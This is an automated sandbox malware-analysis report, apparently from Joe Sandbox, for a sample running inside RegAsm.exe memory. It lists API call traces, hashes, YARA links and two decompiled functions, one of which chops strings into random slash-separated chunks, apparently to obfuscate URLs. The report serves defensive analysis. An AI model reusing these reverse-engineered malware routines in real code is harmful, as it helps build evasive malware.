GetLastError.KERNEL32 ref: 03F01EB5

Strings

`, xrefs: 03F01E71

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$ErrorLastlstrcpymemcpywsprintf
String ID: `
API String ID: 324226357-1850852036
Opcode ID: 79953c0b924d4547489f2b570ad210ae67438b632bfa6a0caacf1de52f9de04f
Instruction ID: 142290e84460195c61153f2592c06c1a79a85ec124b257e77711263a5dfb6707
Opcode Fuzzy Hash: 79953c0b924d4547489f2b570ad210ae67438b632bfa6a0caacf1de52f9de04f
Instruction Fuzzy Hash: C931BF7A50030EEBDB22EF69CC84E9F7BA9FF54350F048129F9159A290DB74E9149B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0EBA2, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1AF7B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?), ref: 03F1AF89

RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0EC0A
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03F0EC59

Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,03F19EF0,00000000,03F19EF1,00000080,00000000,00000000,03F24E08,74E069A0,03F19EF0,?), ref: 03F17461
Part of subcall function 03F17420: GetLastError.KERNEL32 ref: 03F1746B
Part of subcall function 03F17420: WaitForSingleObject.KERNEL32(000000C8), ref: 03F17490
Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 03F174B1
Part of subcall function 03F17420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03F174D9
Part of subcall function 03F17420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 03F174EE
Part of subcall function 03F17420: SetEndOfFile.KERNEL32(00000001), ref: 03F174FB
Part of subcall function 03F17420: CloseHandle.KERNEL32(00000001), ref: 03F17513

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,03F1A78D,?,?,?,?,?,?), ref: 03F0EC8E
HeapFree.KERNEL32(00000000,?,?,?,?,03F1A78D,?,?,?,?,?,?,00000000,00000000), ref: 03F0EC9E

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 4200334623-0
Opcode ID: c642ba862273ba2242ea4e0d9941c394e9f438637b2ed1119c5d3c864348d6a4
Instruction ID: 48b0304ebc3e53600031ba84442adbaf9e9c0c593b5da1fdf463468554b9d39e
Opcode Fuzzy Hash: c642ba862273ba2242ea4e0d9941c394e9f438637b2ed1119c5d3c864348d6a4
Instruction Fuzzy Hash: 15314675900119FFEB20EFA8DC88CAEBBBDFB18244B140465F914D31A0D772AE51EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1499A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,03F0422A,?,?,?,?,2DE853EC,03F0AAC3,03F0422A,03F0AAC3), ref: 03F14A20

Strings

S-, xrefs: 03F14A42
S-S-, xrefs: 03F14A4C
S-, xrefs: 03F14A9B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID: S-$S-$S-S-
API String ID: 3510742995-1321340305
Opcode ID: 9dfa8aa4729cd1bd6921d2389238fb921fdac9511a3686a224dbbd06575afd19
Instruction ID: 08f0dff8ae5bc240531fc871d112b8058c48a54efe211ef6e26cf417dfed4157
Opcode Fuzzy Hash: 9dfa8aa4729cd1bd6921d2389238fb921fdac9511a3686a224dbbd06575afd19
Instruction Fuzzy Hash: 83317A72908302AFC710EE5AE88196EB7FCBBC8314F054A2DF995C7190D770D9698B96

Uniqueness

Uniqueness Score: -1.00%

Function 03F01402, Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03F0145B
memcpy.NTDLL(00000018,?,?), ref: 03F01484
RegisterWaitForSingleObject.KERNEL32(00000010,?,03F21927,00000000,000000FF,00000008), ref: 03F014C3
HeapFree.KERNEL32(00000000,00000000), ref: 03F014D6

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
String ID:
API String ID: 2780211928-0
Opcode ID: 1b29eb4471a39e2677701766d1c226fd36d071955e2bd598eb62dd024211f5dc
Instruction ID: bb25896a153b93ffc25eeec2f1344a61f7c79195556c815ca06a5a693d292b50
Opcode Fuzzy Hash: 1b29eb4471a39e2677701766d1c226fd36d071955e2bd598eb62dd024211f5dc
Instruction Fuzzy Hash: 41316D7460070AEFDB20EF69DC44E9A7BA9FF15320F008129F925D62E0D771E851DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F1CC06, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 03F1CC35
SetEvent.KERNEL32(?), ref: 03F1CC7F
TlsSetValue.KERNEL32(00000001), ref: 03F1CCB9
TlsSetValue.KERNEL32(00000000), ref: 03F1CCD5

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: b300dedf5ac888734ae010cedd020d99952a0b9a69a0572741fe31167e586e12
Instruction ID: d5cf80f732b962e23e1be6b746c0d39a77dcc6304c4d128178d6cf3c95dbd054
Opcode Fuzzy Hash: b300dedf5ac888734ae010cedd020d99952a0b9a69a0572741fe31167e586e12
Instruction Fuzzy Hash: 3621BF31640289EFDB31DF69EC849AABBA6FF81B50B180525F506CB170D771EC60AB80

Uniqueness

Uniqueness Score: -1.00%

Function 03F158DA, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F12C7C: memcpy.NTDLL(00000000,00000110,03F0AAC3,03F0AAC3,00000000,00000000,00000000,?,?,?,03F0422A), ref: 03F12CB2
Part of subcall function 03F12C7C: memset.NTDLL ref: 03F12D28
Part of subcall function 03F12C7C: memset.NTDLL ref: 03F12D3C

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 03F15932
lstrcmpi.KERNEL32(00000000,?), ref: 03F15959
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03F1599E
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 03F159AF

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: 137665b0bcc24d6c0a4664b337fb69071d43aeb7d9ca961555fc79d22ae0eb6e
Instruction ID: 2c1e7874a99f2be9ffae09e08239706a6481df392dec9c4dac7d92b55575fd6d
Opcode Fuzzy Hash: 137665b0bcc24d6c0a4664b337fb69071d43aeb7d9ca961555fc79d22ae0eb6e
Instruction Fuzzy Hash: 08219A35A0020AFFDF20EFA5EC50AAD7BB9EF55214F148020F908EA164C770AE24DF61

Uniqueness

Uniqueness Score: -1.00%

Function 010A2EE0, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E010A2EE0(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E010A4573(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x010a2eec
0x010a2ef0
0x010a2ef1
0x010a2ef2
0x010a2ef4
0x010a2ef6
0x010a2efb
0x010a2efe
0x010a2f95
0x010a2f9c
0x010a2f9c
0x010a2f07
0x010a2f0e
0x010a2f1e
0x010a2f1e
0x010a2f24
0x010a2f26
0x010a2f2b
0x010a2f34
0x010a2f3c
0x010a2f3f
0x010a2f4a
0x010a2f4e
0x010a2f50
0x010a2f51
0x010a2f5a
0x010a2f5e
0x010a2f6f
0x010a2f60
0x010a2f65
0x010a2f6a
0x010a2f79
0x010a2f79
0x010a2f4e
0x010a2f7f
0x010a2f85
0x010a2f85
0x010a2f8e
0x010a2f93
0x010a2f93
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 010A2F0E
lstrlenW.KERNEL32(?), ref: 010A2F44
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 010A2F65
SysFreeString.OLEAUT32(?), ref: 010A2F79

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 7f57663642df5abaefde17b87ededde0a3d75b28f9bed1b6da19bc896b7ef3dc
Instruction ID: 462f2fd1279ea1197f5775f37ea8bde76beebacd3f2365e64b5768606b480efc
Opcode Fuzzy Hash: 7f57663642df5abaefde17b87ededde0a3d75b28f9bed1b6da19bc896b7ef3dc
Instruction Fuzzy Hash: 6C214175A00209EFDB11DFE8C884DDEBBB8FF49254B5041B9E985E7214E771DA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F23269, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F2328B
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 03F232CF
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 03F23312
CloseHandle.KERNEL32(?,?,?,?,?), ref: 03F23335

Part of subcall function 03F13D64: GetTickCount.KERNEL32 ref: 03F13D74
Part of subcall function 03F13D64: CreateFileW.KERNEL32(03F1044B,80000000,00000003,03F2C1A8,00000003,00000000,00000000,?,03F1044B,?,?,?,00000000), ref: 03F13D91
Part of subcall function 03F13D64: GetFileSize.KERNEL32(03F1044B,00000000,?,00000001,?,03F1044B,?,?,?,00000000), ref: 03F13DC4
Part of subcall function 03F13D64: CreateFileMappingA.KERNEL32(03F1044B,03F2C1A8,00000002,00000000,00000000,03F1044B), ref: 03F13DD8
Part of subcall function 03F13D64: lstrlen.KERNEL32(03F1044B,?,03F1044B,?,?,?,00000000), ref: 03F13DF4
Part of subcall function 03F13D64: lstrcpy.KERNEL32(?,03F1044B), ref: 03F13E04
Part of subcall function 03F13D64: HeapFree.KERNEL32(00000000,03F1044B,?,03F1044B,?,?,?,00000000), ref: 03F13E1F
Part of subcall function 03F13D64: CloseHandle.KERNEL32(03F1044B,?,00000001,?,03F1044B), ref: 03F13E31

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 3efa0bf98f2bf4a90db0b1ad1c3ceb28bae20a737d50a59476c391d4aeb7b55e
Instruction ID: 6c3adfb06bcd8d7bf77c0ebc87fdd582e531ca327b5bacc6736d5dea123ca570
Opcode Fuzzy Hash: 3efa0bf98f2bf4a90db0b1ad1c3ceb28bae20a737d50a59476c391d4aeb7b55e
Instruction Fuzzy Hash: 432157B590021DEADB21EF65EC44EEEBBB9EF44310F180126F815E2160EB74DA55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03F01888, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F018B7
lstrlen.KERNEL32(00000000), ref: 03F018C7

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

strcpy.NTDLL ref: 03F018DE
StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 03F018E8

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateHeaplstrlenmemsetstrcpy
String ID:
API String ID: 528014985-0
Opcode ID: daec3fe2b5349a8f577ae20c6ce2bb185cb182215873463c3d51779a853c6549
Instruction ID: fcd4c291960200135f28154084404e4c375333f6cc09f1c1809106a51cd84b78
Opcode Fuzzy Hash: daec3fe2b5349a8f577ae20c6ce2bb185cb182215873463c3d51779a853c6549
Instruction Fuzzy Hash: 4121BE7A504306AFE720EF68D848B6AB7ECEF54711F088419FD9786281EB74D850DB11

Uniqueness

Uniqueness Score: -1.00%

Function 03F24079, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(043AB148), ref: 03F2408F
RtlLeaveCriticalSection.NTDLL(043AB148), ref: 03F240AA
GetLastError.KERNEL32 ref: 03F24118
GetLastError.KERNEL32 ref: 03F24127

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 0aaf77306b9b1cc9166e5c5d416840ec45083ce3aacc680e7946e22118d149e4
Instruction ID: 801ef2a6ea4a40e8c53a153dd573eabc9b8f895bf4515f5b093b155c23407bc8
Opcode Fuzzy Hash: 0aaf77306b9b1cc9166e5c5d416840ec45083ce3aacc680e7946e22118d149e4
Instruction Fuzzy Hash: F8215A36901619EFCB22DF96D844A9EBBB8FF18711F158155F805E3260CB74DA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 03F111B1, Relevance: 6.1, APIs: 4, Instructions: 74threadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B6C0: GetTickCount.KERNEL32 ref: 03F0B6D6
Part of subcall function 03F0B6C0: wsprintfA.USER32 ref: 03F0B717
Part of subcall function 03F0B6C0: GetModuleHandleA.KERNEL32(00000000), ref: 03F0B729

GetModuleHandleA.KERNEL32(00000000,?), ref: 03F111D8
GetLastError.KERNEL32 ref: 03F111F2
RtlExitUserThread.NTDLL(?), ref: 03F1120C
GetLastError.KERNEL32 ref: 03F1124C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorHandleLastModule$CountExitThreadTickUserwsprintf
String ID:
API String ID: 1798890819-0
Opcode ID: 1b786d5ddfb65a802b842880e0138d3925032350551fdbdff957930131b1d30b
Instruction ID: d9522709bec7570b63ee2f816847092c1d7a831c64a6e8b0b880a752ad29f070
Opcode Fuzzy Hash: 1b786d5ddfb65a802b842880e0138d3925032350551fdbdff957930131b1d30b
Instruction Fuzzy Hash: 3E11377140028AEF9720EF69EC48CBBBBBCFAD6761B540A19F952C2054DB209C15DB72

Uniqueness

Uniqueness Score: -1.00%

Function 03F04D4D, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 03F199FB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03F04D64), ref: 03F19A21

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000FFF,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03F04D9F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,03F05F90,?), ref: 03F04DB1
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,03F05F90,?), ref: 03F04DC9
CloseHandle.KERNEL32(?,?,?,?,?,?,03F05F90,?), ref: 03F04DE4

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 0432989b181656eaa07b97ae38459e33d1733c20a9a4dd146041039ca6532d1d
Instruction ID: 3452e6de4b70082aa5852d8674e83901260af8e690853c0971a856d3a25b19d7
Opcode Fuzzy Hash: 0432989b181656eaa07b97ae38459e33d1733c20a9a4dd146041039ca6532d1d
Instruction Fuzzy Hash: B4115B75A01219FBDB20FFAADC88EEFBE6DFF01650F144015FA15E5094D7709A40EAA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0811C, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03F2B620,03F2B7A4,00000402,03F2B7A4), ref: 03F08154

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpy.KERNEL32(00000000,03F2B620), ref: 03F0816B
StrChrA.SHLWAPI(00000000,0000002E), ref: 03F08174
GetModuleHandleA.KERNEL32(00000000), ref: 03F08192

Part of subcall function 03F1FA40: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,03F11BE7,?,03F2B620,03F11BE7,?,00000000,00000004,03F0F20D,?,810C74FC), ref: 03F1FB17
Part of subcall function 03F1FA40: VirtualProtect.KERNELBASE(03F2B7A4,00000004,03F0F20D,03F0F20D,03F11BE7,?,00000000,00000004,03F0F20D,?,810C74FC,00000000,?,03F28560,0000001C,03F19FA2), ref: 03F1FB32
Part of subcall function 03F1FA40: RtlEnterCriticalSection.NTDLL(03F2C300), ref: 03F1FB56

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: f52bbd65d645f4727e89ae07f80773b8c62001040a204309a4e1c92f97653f45
Instruction ID: 5bffd73e43d5f0b65252b052593db65fbcbe9f1fa9e1de14d4abe96d80ce9af3
Opcode Fuzzy Hash: f52bbd65d645f4727e89ae07f80773b8c62001040a204309a4e1c92f97653f45
Instruction Fuzzy Hash: 1B213A74A00309EFCB14DF68C848FAEBBB9AF44344F148459E906DB290DB74D941EB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F16D09, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,74E48250,74E069A0,?,?,?,03F1BAD2,?,00000000,03F1B2A5), ref: 03F16D19

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,03F1BAD2,?,00000000,03F1B2A5), ref: 03F16D3B
lstrcpyW.KERNEL32(00000000,00000000), ref: 03F16D67
lstrcatW.KERNEL32(00000000,?), ref: 03F16D7A

Part of subcall function 03F0B0FA: strstr.NTDLL ref: 03F0B1D2
Part of subcall function 03F0B0FA: strstr.NTDLL ref: 03F0B225

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID:
API String ID: 3712611166-0
Opcode ID: 5561dd9ffc06f8a95c64b84511d783337965ae5626ac74968d57c4db8269856b
Instruction ID: c8e0e151565e42ecbbc07c5d154de1f874f468f4b16c4df1f01503be4187ba0b
Opcode Fuzzy Hash: 5561dd9ffc06f8a95c64b84511d783337965ae5626ac74968d57c4db8269856b
Instruction Fuzzy Hash: 9B11297660021AFFDF11EFA5DC88CEEBBADEF05255B048025F905D6110DB71DA519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F231C3, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 03F231DE
RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 03F23202
RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 03F2325A

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 03F2322B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: ebf0abdef8db502b16135f3fab7f849e25d28b9ce0a922801a1121990d491404
Instruction ID: b888c5c29d27a922eed479a88c907e03d98aba7df51f7372e95048a40d05e774
Opcode Fuzzy Hash: ebf0abdef8db502b16135f3fab7f849e25d28b9ce0a922801a1121990d491404
Instruction Fuzzy Hash: E121C0B990011DFFCF11DF98DD848EEBFB9EF88240F148066E905AA254E3759A90DB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A2929, Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E010A2929(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x10aa290, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x10aa2a8; // 0x171292fd
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x10aa2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x010a2931
0x010a2934
0x010a293a
0x010a2952
0x010a2956
0x010a2959
0x010a295b
0x010a295e
0x010a2960
0x010a2963
0x010a2965
0x010a2965
0x010a2967
0x010a2972
0x010a2977
0x010a2988
0x010a2990
0x010a2995
0x010a2998
0x010a299b
0x010a299d
0x010a29a3
0x010a29a6
0x010a29a6
0x010a29a6
0x010a29b1
0x010a29b6
0x010a29c0

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,010A2812,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A2934
RtlAllocateHeap.NTDLL(00000000,?), ref: 010A294C
memcpy.NTDLL(00000000,03409630,-00000008,?,?,?,010A2812,00000000,?,00000000,010A2E14,00000000,03409630), ref: 010A2990
memcpy.NTDLL(00000001,03409630,00000001,010A2E14,00000000,03409630), ref: 010A29B1

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 4aac21299ab355616f6c575312a134419b20553d766c9a19da809eb32e5cd3e5
Instruction ID: bc57ddf9034181d8253e04e188ed43b295ef88af6b391fce04e0d5a1ef1825ca
Opcode Fuzzy Hash: 4aac21299ab355616f6c575312a134419b20553d766c9a19da809eb32e5cd3e5
Instruction Fuzzy Hash: D2110A76A00115BFD7208BADDC88D9EBBEEDB846A0B850176F544D7140E6759D14C750

Uniqueness

Uniqueness Score: -1.00%

Function 03F08690, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03F1EEBF,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F0869B
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F086B3
memcpy.NTDLL(00000000,?,-00000008,?,?,?,03F1EEBF,00000000,?,?,03F05A2C,00000000,043AB188), ref: 03F086F7
memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 03F08718

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: e777a5790db7e0e8a1735832f6758ba30b54820434d91ff79701a50819d6b1d2
Instruction ID: 18441afe3971939fcebede368b4b909662e4b619dcc724d450c68bd18cc1644e
Opcode Fuzzy Hash: e777a5790db7e0e8a1735832f6758ba30b54820434d91ff79701a50819d6b1d2
Instruction Fuzzy Hash: 7C112C76A00219FFC720DF69DC89D9EBFADDB91250B090175F405D7190E6709D009760

Uniqueness

Uniqueness Score: -1.00%

Function 03F224E3, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,?,03F1552A,00000000,00000000), ref: 03F22501
GetLastError.KERNEL32(?,00000000,?,03F1552A,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,03F1DC80,?,0000001E), ref: 03F22509

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: a18d8a5c274955c05fd856d00bc1f82483dd14e9779f4fff601650199229c13e
Instruction ID: 51878c5e81e5c006a8a7f751749b737e2271444f30bcd0a1779a1cf99be3223d
